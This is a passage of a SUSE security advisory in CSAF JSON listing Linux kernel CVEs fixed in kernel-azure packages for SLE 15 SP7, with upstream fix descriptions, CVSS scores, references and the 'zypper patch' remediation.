"summary": "SUSE Bug 1255482 for CVE-2025-68337",
"url": "https://bugzilla.suse.com/1255482"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-6.4.0-150700.20.27.1.x86_64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-devel-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-devel-6.4.0-150700.20.27.1.x86_64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-devel-azure-6.4.0-150700.20.27.1.noarch",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-source-azure-6.4.0-150700.20.27.1.noarch",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-syms-azure-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-syms-azure-6.4.0-150700.20.27.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-6.4.0-150700.20.27.1.x86_64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-devel-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-devel-6.4.0-150700.20.27.1.x86_64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-devel-azure-6.4.0-150700.20.27.1.noarch",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-source-azure-6.4.0-150700.20.27.1.noarch",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-syms-azure-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-syms-azure-6.4.0-150700.20.27.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-12T11:26:05Z",
"details": "moderate"
}
],
"title": "CVE-2025-68337"
},
{
"cve": "CVE-2025-68349",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-68349"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nNFSv4/pNFS: Clear NFS_INO_LAYOUTCOMMIT in pnfs_mark_layout_stateid_invalid\n\nFixes a crash when layout is null during this call stack:\n\nwrite_inode\n -\u003e nfs4_write_inode\n -\u003e pnfs_layoutcommit_inode\n\npnfs_set_layoutcommit relies on the lseg refcount to keep the layout\naround. Need to clear NFS_INO_LAYOUTCOMMIT otherwise we might attempt\nto reference a null layout.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-6.4.0-150700.20.27.1.x86_64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-devel-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-devel-6.4.0-150700.20.27.1.x86_64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-devel-azure-6.4.0-150700.20.27.1.noarch",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-source-azure-6.4.0-150700.20.27.1.noarch",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-syms-azure-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-syms-azure-6.4.0-150700.20.27.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-68349",
"url": "https://www.suse.com/security/cve/CVE-2025-68349"
},
{
"category": "external",
"summary": "SUSE Bug 1255544 for CVE-2025-68349",
"url": "https://bugzilla.suse.com/1255544"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-6.4.0-150700.20.27.1.x86_64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-devel-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-devel-6.4.0-150700.20.27.1.x86_64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-devel-azure-6.4.0-150700.20.27.1.noarch",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-source-azure-6.4.0-150700.20.27.1.noarch",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-syms-azure-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-syms-azure-6.4.0-150700.20.27.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-6.4.0-150700.20.27.1.x86_64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-devel-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-devel-6.4.0-150700.20.27.1.x86_64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-devel-azure-6.4.0-150700.20.27.1.noarch",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-source-azure-6.4.0-150700.20.27.1.noarch",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-syms-azure-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-syms-azure-6.4.0-150700.20.27.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-12T11:26:05Z",
"details": "moderate"
}
],
"title": "CVE-2025-68349"
},
{
"cve": "CVE-2025-68363",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-68363"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nbpf: Check skb-\u003etransport_header is set in bpf_skb_check_mtu\n\nThe bpf_skb_check_mtu helper needs to use skb-\u003etransport_header when\nthe BPF_MTU_CHK_SEGS flag is used:\n\n\tbpf_skb_check_mtu(skb, ifindex, \u0026mtu_len, 0, BPF_MTU_CHK_SEGS)\n\nThe transport_header is not always set. There is a WARN_ON_ONCE\nreport when CONFIG_DEBUG_NET is enabled + skb-\u003egso_size is set +\nbpf_prog_test_run is used:\n\nWARNING: CPU: 1 PID: 2216 at ./include/linux/skbuff.h:3071\n skb_gso_validate_network_len\n bpf_skb_check_mtu\n bpf_prog_3920e25740a41171_tc_chk_segs_flag # A test in the next patch\n bpf_test_run\n bpf_prog_test_run_skb\n\nFor a normal ingress skb (not test_run), skb_reset_transport_header\nis performed but there is plan to avoid setting it as described in\ncommit 2170a1f09148 (\"net: no longer reset transport_header in __netif_receive_skb_core()\").\n\nThis patch fixes the bpf helper by checking\nskb_transport_header_was_set(). The check is done just before\nskb-\u003etransport_header is used, to avoid breaking the existing bpf prog.\nThe WARN_ON_ONCE is limited to bpf_prog_test_run, so targeting bpf-next.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-6.4.0-150700.20.27.1.x86_64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-devel-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-devel-6.4.0-150700.20.27.1.x86_64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-devel-azure-6.4.0-150700.20.27.1.noarch",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-source-azure-6.4.0-150700.20.27.1.noarch",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-syms-azure-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-syms-azure-6.4.0-150700.20.27.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-68363",
"url": "https://www.suse.com/security/cve/CVE-2025-68363"
},
{
"category": "external",
"summary": "SUSE Bug 1255552 for CVE-2025-68363",
"url": "https://bugzilla.suse.com/1255552"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-6.4.0-150700.20.27.1.x86_64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-devel-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-devel-6.4.0-150700.20.27.1.x86_64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-devel-azure-6.4.0-150700.20.27.1.noarch",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-source-azure-6.4.0-150700.20.27.1.noarch",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-syms-azure-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-syms-azure-6.4.0-150700.20.27.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-6.4.0-150700.20.27.1.x86_64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-devel-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-devel-6.4.0-150700.20.27.1.x86_64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-devel-azure-6.4.0-150700.20.27.1.noarch",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-source-azure-6.4.0-150700.20.27.1.noarch",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-syms-azure-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-syms-azure-6.4.0-150700.20.27.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-12T11:26:05Z",
"details": "moderate"
}
],
"title": "CVE-2025-68363"
},
{
"cve": "CVE-2025-68365",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-68365"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nfs/ntfs3: Initialize allocated memory before use\n\nKMSAN reports: Multiple uninitialized values detected:\n\n- KMSAN: uninit-value in ntfs_read_hdr (3)\n- KMSAN: uninit-value in bcmp (3)\n\nMemory is allocated by __getname(), which is a wrapper for\nkmem_cache_alloc(). This memory is used before being properly\ncleared. Change kmem_cache_alloc() to kmem_cache_zalloc() to\nproperly allocate and clear memory before use.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-6.4.0-150700.20.27.1.x86_64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-devel-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-devel-6.4.0-150700.20.27.1.x86_64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-devel-azure-6.4.0-150700.20.27.1.noarch",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-source-azure-6.4.0-150700.20.27.1.noarch",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-syms-azure-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-syms-azure-6.4.0-150700.20.27.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-68365",
"url": "https://www.suse.com/security/cve/CVE-2025-68365"
},
{
"category": "external",
"summary": "SUSE Bug 1255548 for CVE-2025-68365",
"url": "https://bugzilla.suse.com/1255548"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-6.4.0-150700.20.27.1.x86_64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-devel-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-devel-6.4.0-150700.20.27.1.x86_64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-devel-azure-6.4.0-150700.20.27.1.noarch",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-source-azure-6.4.0-150700.20.27.1.noarch",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-syms-azure-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-syms-azure-6.4.0-150700.20.27.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-6.4.0-150700.20.27.1.x86_64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-devel-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-devel-6.4.0-150700.20.27.1.x86_64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-devel-azure-6.4.0-150700.20.27.1.noarch",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-source-azure-6.4.0-150700.20.27.1.noarch",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-syms-azure-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-syms-azure-6.4.0-150700.20.27.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-12T11:26:05Z",
"details": "moderate"
}
],
"title": "CVE-2025-68365"
},
{
"cve": "CVE-2025-68366",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-68366"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nnbd: defer config unlock in nbd_genl_connect\n\nThere is one use-after-free warning when running NBD_CMD_CONNECT and\nNBD_CLEAR_SOCK:\n\nnbd_genl_connect\n nbd_alloc_and_init_config // config_refs=1\n nbd_start_device // config_refs=2\n set NBD_RT_HAS_CONFIG_REF\t\t\topen nbd // config_refs=3\n recv_work done // config_refs=2\n\t\t\t\t\t\tNBD_CLEAR_SOCK // config_refs=1\n\t\t\t\t\t\tclose nbd // config_refs=0\n refcount_inc -\u003e uaf\n\n------------[ cut here ]------------\nrefcount_t: addition on 0; use-after-free.\nWARNING: CPU: 24 PID: 1014 at lib/refcount.c:25 refcount_warn_saturate+0x12e/0x290\n nbd_genl_connect+0x16d0/0x1ab0\n genl_family_rcv_msg_doit+0x1f3/0x310\n genl_rcv_msg+0x44a/0x790\n\nThe issue can be easily reproduced by adding a small delay before\nrefcount_inc(\u0026nbd-\u003econfig_refs) in nbd_genl_connect():\n\n mutex_unlock(\u0026nbd-\u003econfig_lock);\n if (!ret) {\n set_bit(NBD_RT_HAS_CONFIG_REF, \u0026config-\u003eruntime_flags);\n+ printk(\"before sleep\\n\");\n+ mdelay(5 * 1000);\n+ printk(\"after sleep\\n\");\n refcount_inc(\u0026nbd-\u003econfig_refs);\n nbd_connect_reply(info, nbd-\u003eindex);\n }",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-6.4.0-150700.20.27.1.x86_64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-devel-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-devel-6.4.0-150700.20.27.1.x86_64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-devel-azure-6.4.0-150700.20.27.1.noarch",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-source-azure-6.4.0-150700.20.27.1.noarch",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-syms-azure-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-syms-azure-6.4.0-150700.20.27.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-68366",
"url": "https://www.suse.com/security/cve/CVE-2025-68366"
},
{
"category": "external",
"summary": "SUSE Bug 1255622 for CVE-2025-68366",
"url": "https://bugzilla.suse.com/1255622"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-6.4.0-150700.20.27.1.x86_64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-devel-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-devel-6.4.0-150700.20.27.1.x86_64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-devel-azure-6.4.0-150700.20.27.1.noarch",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-source-azure-6.4.0-150700.20.27.1.noarch",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-syms-azure-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-syms-azure-6.4.0-150700.20.27.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-6.4.0-150700.20.27.1.x86_64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-devel-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-devel-6.4.0-150700.20.27.1.x86_64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-devel-azure-6.4.0-150700.20.27.1.noarch",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-source-azure-6.4.0-150700.20.27.1.noarch",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-syms-azure-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-syms-azure-6.4.0-150700.20.27.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-12T11:26:05Z",
"details": "moderate"
}
],
"title": "CVE-2025-68366"
},
{
"cve": "CVE-2025-68367",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-68367"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nmacintosh/mac_hid: fix race condition in mac_hid_toggle_emumouse\n\nThe following warning appears when running syzkaller, and this issue also\nexists in the mainline code.\n\n ------------[ cut here ]------------\n list_add double add: new=ffffffffa57eee28, prev=ffffffffa57eee28, next=ffffffffa5e63100.\n WARNING: CPU: 0 PID: 1491 at lib/list_debug.c:35 __list_add_valid_or_report+0xf7/0x130\n Modules linked in:\n CPU: 0 PID: 1491 Comm: syz.1.28 Not tainted 6.6.0+ #3\n Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS rel-1.16.0-0-gd239552ce722-prebuilt.qemu.org 04/01/2014\n RIP: 0010:__list_add_valid_or_report+0xf7/0x130\n RSP: 0018:ff1100010dfb7b78 EFLAGS: 00010282\n RAX: 0000000000000000 RBX: ffffffffa57eee18 RCX: ffffffff97fc9817\n RDX: 0000000000040000 RSI: ffa0000002383000 RDI: 0000000000000001\n RBP: ffffffffa57eee28 R08: 0000000000000001 R09: ffe21c0021bf6f2c\n R10: 0000000000000001 R11: 6464615f7473696c R12: ffffffffa5e63100\n R13: ffffffffa57eee28 R14: ffffffffa57eee28 R15: ff1100010dfb7d48\n FS: 00007fb14398b640(0000) GS:ff11000119600000(0000) knlGS:0000000000000000\n CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033\n CR2: 0000000000000000 CR3: 000000010d096005 CR4: 0000000000773ef0\n DR0: 0000000000000000 DR1: 0000000000000000 DR2: 0000000000000000\n DR3: 0000000000000000 DR6: 00000000fffe0ff0 DR7: 0000000000000400\n PKRU: 80000000\n Call Trace:\n \u003cTASK\u003e\n input_register_handler+0xb3/0x210\n mac_hid_start_emulation+0x1c5/0x290\n mac_hid_toggle_emumouse+0x20a/0x240\n proc_sys_call_handler+0x4c2/0x6e0\n new_sync_write+0x1b1/0x2d0\n vfs_write+0x709/0x950\n ksys_write+0x12a/0x250\n do_syscall_64+0x5a/0x110\n entry_SYSCALL_64_after_hwframe+0x78/0xe2\n\nThe WARNING occurs when two processes concurrently write to the mac-hid\nemulation sysctl, causing a race condition in mac_hid_toggle_emumouse().\nBoth processes read old_val=0, then both try to register the input handler,\nleading to a double list_add of the same handler.\n\n CPU0 CPU1\n ------------------------- -------------------------\n vfs_write() //write 1 vfs_write() //write 1\n proc_sys_write() proc_sys_write()\n mac_hid_toggle_emumouse() mac_hid_toggle_emumouse()\n old_val = *valp // old_val=0\n old_val = *valp // old_val=0\n mutex_lock_killable()\n proc_dointvec() // *valp=1\n mac_hid_start_emulation()\n input_register_handler()\n mutex_unlock()\n mutex_lock_killable()\n proc_dointvec()\n mac_hid_start_emulation()\n input_register_handler() //Trigger Warning\n mutex_unlock()\n\nFix this by moving the old_val read inside the mutex lock region.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-6.4.0-150700.20.27.1.x86_64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-devel-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-devel-6.4.0-150700.20.27.1.x86_64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-devel-azure-6.4.0-150700.20.27.1.noarch",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-source-azure-6.4.0-150700.20.27.1.noarch",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-syms-azure-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-syms-azure-6.4.0-150700.20.27.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-68367",
"url": "https://www.suse.com/security/cve/CVE-2025-68367"
},
{
"category": "external",
"summary": "SUSE Bug 1255547 for CVE-2025-68367",
"url": "https://bugzilla.suse.com/1255547"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-6.4.0-150700.20.27.1.x86_64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-devel-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-devel-6.4.0-150700.20.27.1.x86_64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-devel-azure-6.4.0-150700.20.27.1.noarch",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-source-azure-6.4.0-150700.20.27.1.noarch",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-syms-azure-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-syms-azure-6.4.0-150700.20.27.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-6.4.0-150700.20.27.1.x86_64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-devel-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-devel-6.4.0-150700.20.27.1.x86_64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-devel-azure-6.4.0-150700.20.27.1.noarch",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-source-azure-6.4.0-150700.20.27.1.noarch",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-syms-azure-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-syms-azure-6.4.0-150700.20.27.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-12T11:26:05Z",
"details": "moderate"
}
],
"title": "CVE-2025-68367"
},
{
"cve": "CVE-2025-68372",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-68372"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nnbd: defer config put in recv_work\n\nThere is one uaf issue in recv_work when running NBD_CLEAR_SOCK and\nNBD_CMD_RECONFIGURE:\n nbd_genl_connect // conf_ref=2 (connect and recv_work A)\n nbd_open\t // conf_ref=3\n recv_work A done // conf_ref=2\n NBD_CLEAR_SOCK // conf_ref=1\n nbd_genl_reconfigure // conf_ref=2 (trigger recv_work B)\n close nbd\t // conf_ref=1\n recv_work B\n config_put // conf_ref=0\n atomic_dec(\u0026config-\u003erecv_threads); -\u003e UAF\n\nOr only running NBD_CLEAR_SOCK:\n nbd_genl_connect // conf_ref=2\n nbd_open \t // conf_ref=3\n NBD_CLEAR_SOCK // conf_ref=2\n close nbd\n nbd_release\n config_put // conf_ref=1\n recv_work\n config_put \t // conf_ref=0\n atomic_dec(\u0026config-\u003erecv_threads); -\u003e UAF\n\nCommit 87aac3a80af5 (\"nbd: call nbd_config_put() before notifying the\nwaiter\") moved nbd_config_put() to run before waking up the waiter in\nrecv_work, in order to ensure that nbd_start_device_ioctl() would not\nbe woken up while nbd-\u003etask_recv was still uncleared.\n\nHowever, in nbd_start_device_ioctl(), after being woken up it explicitly\ncalls flush_workqueue() to make sure all current works are finished.\nTherefore, there is no need to move the config put ahead of the wakeup.\n\nMove nbd_config_put() to the end of recv_work, so that the reference is\nheld for the whole lifetime of the worker thread. This makes sure the\nconfig cannot be freed while recv_work is still running, even if clear\n+ reconfigure interleave.\n\nIn addition, we don\u0027t need to worry about recv_work dropping the last\nnbd_put (which causes deadlock):\n\npath A (netlink with 